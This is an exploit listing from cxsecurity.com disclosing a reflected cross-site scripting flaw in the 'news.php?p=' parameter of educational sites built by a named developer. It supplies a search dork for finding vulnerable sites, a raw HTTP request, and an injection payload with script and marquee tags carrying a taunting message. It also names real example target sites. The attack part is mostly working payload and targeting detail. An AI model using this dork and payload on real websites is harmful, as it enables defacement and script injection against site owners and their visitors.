Educational Websites Developper - Chris Deotte - Cross Site Scripting (XSS)

2019.01.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Exploit title : Educational Websites Developper - Chris Deotte - Cross Site Scripting (XSS) Exploit author : Salvatrucha dork : intext: Website developed by Chris Deotte Tested on : Win7_64 GET /news/news.php?p= HTTP/1.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 1) the xss vulnerability classification : >CWECWE-79 >CVSS Base score: 5.3 — CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Exploit : >http://target/news/news.php?p=[%Inject_Here%] >Use payload/Injection : 1'"()%26%25<acx><ScRiPt ></ScRiPt><marquee><h>to my M7 and others F you are my stars it's great honor being with you wish you the best</h></marquee>&q= Web References : >The Cross Site Scripting Faq >OWASP Cross Site Scripting >OWASP PHP Top 5 Examples of vulnerable sites: >https://ccom.ucsd.edu >https://archive.fo/ADOa7

References:

Salvatrucha


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top